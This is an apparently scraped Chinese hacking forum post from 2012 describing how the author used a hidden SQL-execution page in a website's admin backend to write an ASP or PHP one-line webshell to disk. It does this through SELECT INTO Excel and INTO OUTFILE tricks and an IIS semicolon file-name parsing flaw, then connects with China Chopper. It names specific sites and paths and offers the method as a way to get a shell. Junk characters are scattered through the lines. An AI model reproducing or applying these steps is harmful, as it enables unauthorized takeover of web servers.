好不容易进了后台,发现啥上传啊。备份啊多木有。* M4 ], F# v( t2 I
webshell一直拿不到。后来翻了一下源码。有一个执行SQL命令的+ l' |: r+ Z. s. G' Z
文件。可后台没显示这功能。直接填上文件名字,执行命令的选项出来了,
8 i/ R3 R. D) g4 l2 @然后就试用了下面的命令导出一句话木马。没想到成功了。命令方法如下:
! t* o! W0 Y6 y7 d1 l. M% \+ m/ p, b1.create table cmd (a varchar(50))& S: @, N; h/ f2 W c
2.insert into cmd (a) values (‘‘)* U* D" N4 }8 B
3.select * into [a] in ‘D:\wwwroot\www.koohik.com\hacker.asa;.xls’ ‘excel 4.0;’ from cmd' Z0 P. ?+ e. P
(把表cmd的内容导出为物理路径的一个EXCEL文件)
/ u I k$ b6 e: T5 |* s% g0 D! i0 w4.drop table cmd
+ {0 J! x* a" L4 i7 u利用IIS的BUG成功拿到了WEBSHELL。
4 A" } W2 P; R! z1 V9 T2 l/ {3 D, i0 P6 ]0 G
直接菜刀里连接http://www.chouwazi.com/data/xiao.asp;xiao.xls一句话- H- `2 w ?( j8 J8 g0 \
% j7 r, Z1 F, H' K! H SQL语句意思解释:
- y6 N0 q$ X* K3 O& e 第一句/ f% ?8 k5 F9 c
建立一个有一个A字段的表 表名为cmd 字段类型为字符 长度为50& L" L* @, T8 r$ q4 Y
% p/ {8 s/ M+ g5 l6 A/ ~4 j- C1 G1 s 第二句
/ A) g2 W; A1 f# E2 D* _ 在表cmd的a字段插入一句话木马0 P9 L/ Z% `4 C1 G
第三句8 {* U! c- m& J* b3 H
把cmd表a的内容导出到路径e:\host\chouwazi.com\web\data\的EXCEL文件' p2 Q+ q) a1 T7 J
4 v0 w3 S3 T o4 o- g' ^9 o- ^, K
第四句% Q6 H. |# x& S. v2 w9 c' `5 k( T
删除建立的cmd表# E( e ~* S' Q$ x
# z1 H& j! y& s5 }8 K( Y/ U, p 以下内容为测试:8 e# p4 t, ^! h t: m
Access利用后台SQL执行命令功能导出WebShell:
# E V5 M% q8 u0 F% d* m( C" X 这个更简单:. l% Q; C N* V! S0 `6 n
[ol][li]Select 'asp一句话木马' into [vote] in 'd:/chouwazi.com/x.asp;.xls' 'excel 8.0;' from vote [/li][/ol]7 Q0 o- p, W3 o
或者
$ O+ D! ?4 @( |4 ]: V [ol][li]Select 'php一句话木马' into outfile 'F:/wwwroot/chouwazi.com/eval.php'; [/li][/ol]+ f+ B; d2 d5 i$ g% o& z3 \# W& k
6 h8 ?1 u8 y" M* w
后台有执行SQL语句功能(vote为已知表段)
' a( f$ c3 m4 E1 ^ 希望对大家有所帮助拿shell的又一个思路( k& ]% g7 _1 i7 u
|
发表于 2012-9-13 17:53:58
收藏
支持
反对